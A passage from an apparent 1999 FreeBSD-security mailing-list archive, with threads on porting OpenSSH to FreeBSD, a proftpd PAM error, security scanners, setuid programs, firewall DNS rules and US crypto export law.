(Postfix, from userid 758) id DE14F14FF7; Mon, 1 Nov 1999 11:27:07 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id CED721CD734; Mon, 1 Nov 1999 11:27:07 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Mon, 1 Nov 1999 11:27:07 -0800 (PST) From: Kris Kennaway To: security@freebsd.org Cc: ports@freebsd.org Subject: OpenSSH patches Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As has been mentioned here recently, the OpenBSD guys have taken an old version of SSH, from before it caught a restrictive license, cleaned it up (replugged the security holes, etc), and released it as OpenSSH (actually I think it's due to be released "officially" with OpenBSD 2.6). The patch at http://www.freebsd.org/~kris/openssh-991031.patch allows the OpenSSH sources from 991031 (now that it seems to have stabilized somewhat) to build under FreeBSD - the changes are all just tweakery to deal with different location of header and library files in OpenBSD. You need to have the openssl port installed (with RSA support enabled), and the following environment variables must be defined before building will proceed: KERBEROS AFS SKEY TCP_WRAPPERS These should (presumably) be either 'YES' or 'NO' depending on whether or not your system has the relevant libraries available. Note that I have only tested building with TCP_WRAPPERS, since my system doesn't use any of the others. It may build, or it may not. I also haven't tested whether this actually WORKS, because my machine isn't on the 'net right now. It builds fine, though - I'd be interested to hear from people about how it works (it's supposedly interoperable with the "true" SSH 1.x client/servers). Binary size is about 50k larger than the ssh-1.x binaries, because it uses OpenSSL instead of internal crypto routines, and probably pulls in extra stuff indirectly which it doesn't actually use. Making a port would be fairly trivial - you'll have to obtain the source from the OpenBSD CVS repository directly, though - see http://www.openbsd.org/ for information. You can use 'cvs get' from the appropriate server to download the usr.bin/ssh directory. If it wasn't for the US crypto restrictions we all know and love, I'd put the tarball up on my website. Roll on the revolution! :-) Kris ---- Cthulhu for President! For when you're tired of choosing the _lesser_ of two evils.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 12:28:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from east.sunflower.com (gateway.east.sunflower.com [24.124.0.11]) by hub.freebsd.org (Postfix) with ESMTP id 114F0152B9 for ; Mon, 1 Nov 1999 12:28:09 -0800 (PST) (envelope-from chrisj@sunflower.com) Received: from Datavision5 ([192.168.28.204]) by gateway.east.sunflower.com with SMTP id <113794>; Mon, 1 Nov 1999 14:36:29 -0600 Message-ID: <009f01bf24a7$4f4f5200$cc1ca8c0@lawrence.ks.us> From: "Chris Jeter" To: Subject: Pam and Proftpd Date: Mon, 1 Nov 1999 14:25:59 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hello all. i resently started messing with Proftpd. in tring to get everything up and running im running into some PAM problems. as per the readme and info from the mailing list i''ve added the following to my /etc/pam.conf file ftp auth required pam_unix.so try_first_pass ftp account required pam_unix.so try_first_pass ftp session required pam_unix.so try_first_pass on tring to log into the running proftpd syslog returns the following errors. proftpd[29847]: unable to resolve symbol: pam_sm_open_session proftpd[29847]: unable to resolve symbol: pam_sm_close_session proftpd[29847]: PAM(chrisj): Authentication failure any help would be great chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 13:47:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from sneakerz.org (sneakerz.org [208.176.135.226]) by hub.freebsd.org (Postfix) with SMTP id 2912114E2A for ; Mon, 1 Nov 1999 13:47:37 -0800 (PST) (envelope-from dave@sneakerz.org) Received: (qmail 8520 invoked by uid 1004); 27 Oct 1999 05:32:18 -0000 Date: Tue, 26 Oct 1999 22:32:18 -0700 From: "Dr. Dave" To: "Jean-Pierre H. Dumas" Cc: FreeBSD-Security@freebsd.org Subject: Re: Security tests Message-ID: <19991026223218.B8498@sneakerz.org> References: <19991026143635.25359.rocketmail@web1003.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19991026143635.25359.rocketmail@web1003.mail.yahoo.com>; from Jean-Pierre H. Dumas on Tue, Oct 26, 1999 at 04:36:35PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 26, 1999 at 04:36:35PM +0200, Jean-Pierre H. Dumas wrote: > This is to verify the security of a FreeBSD 3.2 > server I am installing. To be used as a POP3 toaster, > with qmail and vmailmgr. > > I installed and ran COPS (a really old one). > It screamed at me about the /var/spool/uucppublic > directory as beeing *world* writable. > It barfed on the passwd and group having the wrong > number of fields (I assume this is because of the > use of perl 5 vs perl 3 at the time of creation > of COPS, something like @_ changed meaning ?) > Question: is the permission of /var/spool/uucppublic > correct once in drwxrwxr-x ? (I do not use uucp, > but...) Cops is VERY old and outdated. If you would like some more recent security tools, visit http://www.securityfocus.com, they also have a bug tracking archive that you can search through by OS. Keeping security on a system is alot more than installing the packages from /usr/ports/security. > Question: What can I do more to have a realistic > report about this server's security ? If this is a corporate environment you may want to look into a site licence for IIS, internet security scanner, http://www.iss.net > Is there any other scanners or whatever that I can get > and run, either from within the server, or from > outside (I have a FreeBSD 3.2, Linux and Windows 95 > machine on the Ethernet) If you are looking for portscanners, you may want to look at nmap, http://www.insecure.org/nmap -- -------------------------------------------------------------------------- Dave McKay dave@sneakerz.org MSN Hotmail http://www.hotmail.com -------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 13:59:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx1.issei.org (mx1.issei.org [210.254.221.66]) by hub.freebsd.org (Postfix) with ESMTP id C4697152BF; Mon, 1 Nov 1999 13:59:24 -0800 (PST) (envelope-from issei@issei.org) Received: from mx1.issei.org (root@mx1.issei.org [3ffe:505:a:1:2a0:c9ff:fec8:8338]) by mx1.issei.org (8.9.3+3.2W/3.7W-v6) with ESMTP/IPv6 id GAA63524; Tue, 2 Nov 1999 06:59:55 +0900 (JST) (envelope-from issei@issei.org) To: security@freebsd.org, ports@freebsd.org Subject: Re: OpenSSH patches In-Reply-To: References: X-Mailer: Mew version 1.94.1 on XEmacs 21.1 (Big Bend) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19991102065758V.issei@issei.org> Date: Tue, 02 Nov 1999 06:57:58 +0900 From: Issei Suzuki X-Dispatcher: imput version 990905(IM130) Lines: 34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In mail "OpenSSH patches" Kris Kennaway wrote: > As has been mentioned here recently, the OpenBSD guys have taken an old > version of SSH, from before it caught a restrictive license, cleaned it up > (replugged the security holes, etc), and released it as OpenSSH (actually I > think it's due to be released "officially" with OpenBSD 2.6). Good news :) > I also haven't tested whether this actually WORKS, because my machine isn't > on the 'net right now. It builds fine, though - I'd be interested to hear > from people about how it works (it's supposedly interoperable with the "true" > SSH 1.x client/servers). It works fine on my FreeBSD 3.3-RELEASE box, though I have not tested on other OS evniroment. Client Server Argorythm Result ----------------------------------------------------- OpenSSH 1.2 ssh 1.2.27 3DES OK ssh 1.2.27 OpenSSH 1.2 3DES OK OpenSSH 1.2 OpenSSH 1.2 3DES OK > If it wasn't for the US crypto restrictions we all know and love, > I'd put the tarball up on my website. It does not seem that OpenSSH source code includes any kind of crypto argorythm (they are included in OpenSSL library), but is it still affected by US crypto restrictions? -- Issei Suzuki To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 14: 2:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.interact.se (smtp1.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id 59CFF14E2A for ; Mon, 1 Nov 1999 14:02:16 -0800 (PST) (envelope-from je@interact.se) Received: from wolfie.interact.se (wolfie.interact.se [193.15.98.202]) by smtp.interact.se (InterACT Mailer) with ESMTP id XAA09886; Mon, 1 Nov 1999 23:02:56 +0100 (CET) Date: Mon, 1 Nov 1999 23:02:04 +0100 (CET) From: Jonas Eriksson To: "Dr. Dave" Cc: "Jean-Pierre H. Dumas" , FreeBSD-Security@FreeBSD.ORG Subject: Re: Security tests In-Reply-To: <19991026223218.B8498@sneakerz.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Try The Nessus remote security scanner, located at: http://www.nessus.org Regards Jonas Eriksson -- InterACT Lule=E5 Network & Security Administrator Tel: +46 (0)920 88803 - Fax: +46 (0)920 88399 Current temp in Lulea/Sweden is 4.6C (40.3F) On Tue, 26 Oct 1999, Dr. Dave wrote: > On Tue, Oct 26, 1999 at 04:36:35PM +0200, Jean-Pierre H. Dumas wrote: > > This is to verify the security of a FreeBSD 3.2 > > server I am installing. To be used as a POP3 toaster, > > with qmail and vmailmgr. > >=20 > > I installed and ran COPS (a really old one). > > It screamed at me about the /var/spool/uucppublic > > directory as beeing *world* writable. > > It barfed on the passwd and group having the wrong > > number of fields (I assume this is because of the > > use of perl 5 vs perl 3 at the time of creation > > of COPS, something like @_ changed meaning ?) > > Question: is the permission of /var/spool/uucppublic > > correct once in drwxrwxr-x ? (I do not use uucp, > > but...) >=20 > Cops is VERY old and outdated. If you would like some more recent securi= ty tools, visit http://www.securityfocus.com, they also have a bug tracking= archive that you can search through by OS. Keeping security on a system i= s alot more than installing the packages from /usr/ports/security. >=20 > > Question: What can I do more to have a realistic > > report about this server's security ? >=20 > If this is a corporate environment you may want to look into a site licen= ce for IIS, internet security scanner, http://www.iss.net >=20 > =20 > > Is there any other scanners or whatever that I can get > > and run, either from within the server, or from > > outside (I have a FreeBSD 3.2, Linux and Windows 95 > > machine on the Ethernet) >=20 > If you are looking for portscanners, you may want to look at nmap, http:/= /www.insecure.org/nmap >=20 > --=20 > -------------------------------------------------------------------------= - > Dave McKay dave@sneakerz.org = =20 > MSN Hotmail http://www.hotmail.com > -------------------------------------------------------------------------= - >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 14:39:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 8E1C214DC4 for ; Mon, 1 Nov 1999 14:39:28 -0800 (PST) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id XAA03315 for freebsd-security@FreeBSD.ORG; Mon, 1 Nov 1999 23:39:25 +0100 (CET) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id D9CF18711; Mon, 1 Nov 1999 20:38:58 +0100 (CET) Date: Mon, 1 Nov 1999 20:38:58 +0100 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use Message-ID: <19991101203858.A39857@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <14364.64172.638014.558487@anarcat.dyndns.org> <99Nov1.143118est.40332@border.alcanet.com.au> <14365.48408.87230.710344@anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0pre2i In-Reply-To: <14365.48408.87230.710344@anarcat.dyndns.org> X-Operating-System: FreeBSD 4.0-CURRENT/ELF AMD-K6/200 & 2x PPro/200 SMP Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Spidey: > Ok. But what is its use??? Is it used by X? Why is it suid? Xwrapper is setuid so that the X server itself doesn't have to be. > Ok. but what _is it_? Why does it needs special permissions? UUCP = Unix-to-Unix CoPy. It is an old but still used way of sending files and execute command across serial lines (and TCP as well). It predates TCP/IP and is used mostly now by European and people who pay by the minutes (or bytes) their phone lines. It is the most efficient way of transfering news batches I know on serial lines. We have a good network of UUCP connected machines here in France and I manage a small USP (Usenet Service Provider :-)) along with friends. We have around 40 people that would kill anyone wanting to remove UUCP support :-) We even have people with PPP or cable connections that are still using UUCP (over TCP) in order to get their mail/news. You don't need hacks like POP before SMTP or multiple mailbox support in POP/IMAP with UUCP. Routing entire domains is natural and multiple account is native usage. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #74: Thu Sep 9 00:20:51 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 14:39:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id DCE6614F95 for ; Mon, 1 Nov 1999 14:39:35 -0800 (PST) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id XAA03318 for freebsd-security@FreeBSD.ORG; Mon, 1 Nov 1999 23:39:34 +0100 (CET) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id CFD28878D; Mon, 1 Nov 1999 20:40:06 +0100 (CET) Date: Mon, 1 Nov 1999 20:40:06 +0100 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use Message-ID: <19991101204006.B39857@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <14364.64172.638014.558487@anarcat.dyndns.org> <19991101173955.L72085@bitbox.follo.net> <14365.50723.872972.30971@anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0pre2i In-Reply-To: <14365.50723.872972.30971@anarcat.dyndns.org> X-Operating-System: FreeBSD 4.0-CURRENT/ELF AMD-K6/200 & 2x PPro/200 SMP Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Spidey: > Yes. I found very surprising that xlock would _need_ to be setuid... You can't get the password of any user if your euid is not 0. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #74: Thu Sep 9 00:20:51 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 14:40: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 096A314FE6 for ; Mon, 1 Nov 1999 14:39:54 -0800 (PST) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id XAA03320 for security@FreeBSD.ORG; Mon, 1 Nov 1999 23:39:48 +0100 (CET) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 857208711; Mon, 1 Nov 1999 23:22:50 +0100 (CET) Date: Mon, 1 Nov 1999 23:22:50 +0100 From: Ollivier Robert To: security@FreeBSD.ORG Subject: Re: hole(s) in default rc.firewall rules Message-ID: <19991101232250.C39857@keltia.freenix.fr> Mail-Followup-To: security@FreeBSD.ORG References: <381DAEE9.75C2EDA5@algroup.co.uk> <46576.941469757@verdi.nethelp.no> <381DB3B2.10002A43@algroup.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0pre2i In-Reply-To: <381DB3B2.10002A43@algroup.co.uk> X-Operating-System: FreeBSD 4.0-CURRENT/ELF AMD-K6/200 & 2x PPro/200 SMP Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Adam Laurie: > blocking UDP traffic to any low port. DNS replies come in on high ports > (at least this is true on the half dozen or so boxes that I've Default before bind 8.2.something was to use port 53 for all answers (from server to server). -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #74: Thu Sep 9 00:20:51 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 14:55:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 2D7D814DC4 for ; Mon, 1 Nov 1999 14:55:32 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id OAA42497; Mon, 1 Nov 1999 14:55:11 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199911012255.OAA42497@gndrsh.dnsmgr.net> Subject: Re: hole(s) in default rc.firewall rules In-Reply-To: <19991101232250.C39857@keltia.freenix.fr> from Ollivier Robert at "Nov 1, 1999 11:22:50 pm" To: roberto@keltia.freenix.fr (Ollivier Robert) Date: Mon, 1 Nov 1999 14:55:11 -0800 (PST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > According to Adam Laurie: > > blocking UDP traffic to any low port. DNS replies come in on high ports > > (at least this is true on the half dozen or so boxes that I've > > Default before bind 8.2.something was to use port 53 for all answers (from > server to server). Actually it as all queries and answers, now it uses high numbers for queries, answers have to come from port 53, thats the socket the query is sent to... And most of us running post 8.2.something bind behind firewalls have configured bind with: query-source address 198.145.92.4 port 53; So we can use a proper set of DNS rules, and yes, the ones shipped with FreeBSD are seriously lacking in that they have ``any'' and they should have ${dnsserver} as a configuration entry. Only your dnsservers need dns traffic, every place else should be shut down nice and tight, everything internal should be talking your your dns servers only via forwarders clauses or proper /etc/resolv.conf settings. -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 15:13:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id E796914EF0; Mon, 1 Nov 1999 15:13:41 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id PAA04793; Mon, 1 Nov 1999 15:13:33 -0800 (PST) (envelope-from jkh@zippy.cdrom.com) To: Kris Kennaway Cc: security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-reply-to: Your message of "Mon, 01 Nov 1999 11:27:07 PST." Date: Mon, 01 Nov 1999 15:13:33 -0800 Message-ID: <4789.941498013@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I, for one, would like to see this bundled with the default distribution and I think our existing degree of crypto separation is enough to take care of the legal issues, not that anyone really knows what those are anymore since the latest round of Clinton administration statements. In today's environment, ssh is far more useful than telnet or rlogin, yet we bundle both. It would be nice to have a system come up for the first time already capable of being logged into remotely in a secure fashion - it would save me, for one, a lot of extra hassle in installing new machines since getting ssh on there is a necessary component to being able to leave a drafty machine room and continue the installation and configuration from a more comfortable place. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 16:23: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from s8-37-26.student.washington.edu (S8-37-26.student.washington.edu [128.208.37.26]) by hub.freebsd.org (Postfix) with ESMTP id D063A14DC4; Mon, 1 Nov 1999 16:22:54 -0800 (PST) (envelope-from jcwells@u.washington.edu) Received: from localhost (jcw@localhost) by s8-37-26.student.washington.edu (8.9.3/8.9.3) with ESMTP id FAA02277; Tue, 2 Nov 1999 05:18:04 GMT (envelope-from jcwells@u.washington.edu) X-Authentication-Warning: s8-37-26.student.washington.edu: jcw owned process doing -bs Date: Tue, 2 Nov 1999 05:18:04 +0000 (GMT) From: "Jason C. Wells" X-Sender: jcw@s8-37-26.student.washington.edu Reply-To: "Jason C. Wells" To: "Jordan K. Hubbard" Cc: Kris Kennaway , security@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <4789.941498013@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 1 Nov 1999, Jordan K. Hubbard wrote: >I, for one, would like to see this bundled with the default >distribution and I think our existing degree of crypto separation is If this happens it will be another example of how the *BSDs work together for the good of the community. Comity in the community produces unity not impugnity. ::groan:: Thank You, | http://students.washington.edu/jcwells/ Jason Wells To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 18: 3: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 9E70A14FCA; Mon, 1 Nov 1999 18:03:01 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 93F061CD737; Mon, 1 Nov 1999 18:02:58 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Mon, 1 Nov 1999 18:02:58 -0800 (PST) From: Kris Kennaway To: "Jordan K. Hubbard" Cc: security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches In-Reply-To: <4789.941498013@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 1 Nov 1999, Jordan K. Hubbard wrote: > I, for one, would like to see this bundled with the default > distribution and I think our existing degree of crypto separation is > enough to take care of the legal issues, not that anyone really knows > what those are anymore since the latest round of Clinton > administration statements. No objections from me! We will of course need to import OpenSSL as well, but I can see only good things coming from that. Kris ---- Cthulhu for President! For when you're tired of choosing the _lesser_ of two evils.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 18: 9: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 286C4151ED; Mon, 1 Nov 1999 18:08:58 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 17EA21CD738; Mon, 1 Nov 1999 18:08:57 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Mon, 1 Nov 1999 18:08:57 -0800 (PST) From: Kris Kennaway To: Issei Suzuki Cc: security@freebsd.org, ports@freebsd.org Subject: Re: OpenSSH patches In-Reply-To: <19991102065758V.issei@issei.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 2 Nov 1999, Issei Suzuki wrote: > > I also haven't tested whether this actually WORKS, because my machine isn't > > on the 'net right now. It builds fine, though - I'd be interested to hear > > from people about how it works (it's supposedly interoperable with the "true" > > SSH 1.x client/servers). > > It works fine on my FreeBSD 3.3-RELEASE box, though I have not > tested on other OS evniroment. Great to hear! > > If it wasn't for the US crypto restrictions we all know and love, > > I'd put the tarball up on my website. > > It does not seem that OpenSSH source code includes any kind of > crypto argorythm (they are included in OpenSSL library), but is it > still affected by US crypto restrictions? There is some confusion (at least to me) about whether software which provides a cryptographic function (like SSH) but which links to an external library to provide the actual cryptographic code is liable under the export restrictions. Otherwise, everyone in the US could just write their cryptographic code to a certain API and have it fulfilled by an internationally-developed crypto library, thereby defeating the intent of the restrictions. I'd very much like this to be true, but I didn't want to risk it being false, seeing as how I'm a guest in ths country and as such very much subject to the whims of the INS :-) Kris ---- Cthulhu for President! For when you're tired of choosing the _lesser_ of two evils.. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 19:25:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 8A56314E0E; Mon, 1 Nov 1999 19:25:49 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id WAA22988; Mon, 1 Nov 1999 22:25:47 -0500 (EST) (envelope-from robert@cyrus.watson.org) Date: Mon, 1 Nov 1999 22:25:47 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Kris Kennaway Cc: Issei Suzuki , security@freebsd.org, ports@freebsd.org Subject: Re: OpenSSH patches In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 1 Nov 1999, Kris Kennaway wrote: > There is some confusion (at least to me) about whether software which > provides a cryptographic function (like SSH) but which links to an > external library to provide the actual cryptographic code is liable under > the export restrictions. > > Otherwise, everyone in the US could just write their cryptographic code to > a certain API and have it fulfilled by an internationally-developed crypto > library, thereby defeating the intent of the restrictions. I'd very much > like this to be true, but I didn't want to risk it being false, seeing as > how I'm a guest in ths country and as such very much subject to the whims > of the INS :-) Yah, me too. My solution was to do the code as employed by some existing US citizens and let them deal with the legal consequences. :-) Of course, I'm due for US citizenship any day now.. Pity about all those "or we'll revoke it" clauses in the application and elsewhere. My recollection is that in general shipping things with APIs strictly used for encryption is still a no-no. The usual work-around is to define a general-purpose data transform API. In Coda, we discussed doing this and providing two modules -- an XOR crypto module, and a compression module, just to show the generalness of the whole thing. Both crypto and compression retain state over the course of the sessions, participate in a chat protocol to get going at the beginning, ... The other one that often works is that code for authentication is fine--i.e., MD5 hashes and MAC code. That also requires keying material, et al. What is the export deal on ebones/Kerberos? Ebones is exportable, but I don't remember a) whether it had to be reviewed/approved, and b) whether or not it actually had direct crypto hooks. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 19:59:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from proxy4.ba.best.com (proxy4.ba.best.com [206.184.139.15]) by hub.freebsd.org (Postfix) with ESMTP id 5AEAE14BC7; Mon, 1 Nov 1999 19:59:28 -0800 (PST) (envelope-from mda@discerning.com) Received: from MDAXKE (cm-24-142-61-115.cableco-op.ispchannel.com [24.142.61.115]) by proxy4.ba.best.com (8.9.3/8.9.2/best.out) with ESMTP id TAA20353; Mon, 1 Nov 1999 19:58:19 -0800 (PST) Date: Mon, 01 Nov 1999 19:58:24 -0800 From: "Mark D. Anderson" To: security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: OpenSSH patches Message-ID: <888466581.941486304@MDAXKE> In-Reply-To: X-Mailer: Mulberry (Win32) [2.0.0a6, s/n U-301276] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> It does not seem that OpenSSH source code includes any kind of >> crypto argorythm (they are included in OpenSSL library), but is it >> still affected by US crypto restrictions? > > There is some confusion (at least to me) about whether software which > provides a cryptographic function (like SSH) but which links to an > external library to provide the actual cryptographic code is liable under > the export restrictions. I am not a lawyer, and all that, but i believe that this is still against U.S. officially. It is usually referred to as "crypto with a hole", and it is still illegal last i checked. Not only can't you ship crypto, you can't ship software capable of using crypto, or something like that. You *can* have APIs that are not crypto-specific (such as a generic transport which can transparently have encryption), but you can't use the simple mechanism described by openssh. Microsoft and HP have permission to ship their stuff, but the hole can't be plugged by a user (officially) until microsoft clears it. See this for more: http://www.zdnet.com/zdnn/content/pcwk/1522/320100.html http://www.mozilla.org/crypto-faq.html#1-4 Of course, none of this is enforceable, but we all know that. Perhaps someone at mozilla, if there are any left, would know the latest. -mda To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 20:46:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id D9B2414F1A for ; Mon, 1 Nov 1999 20:46:43 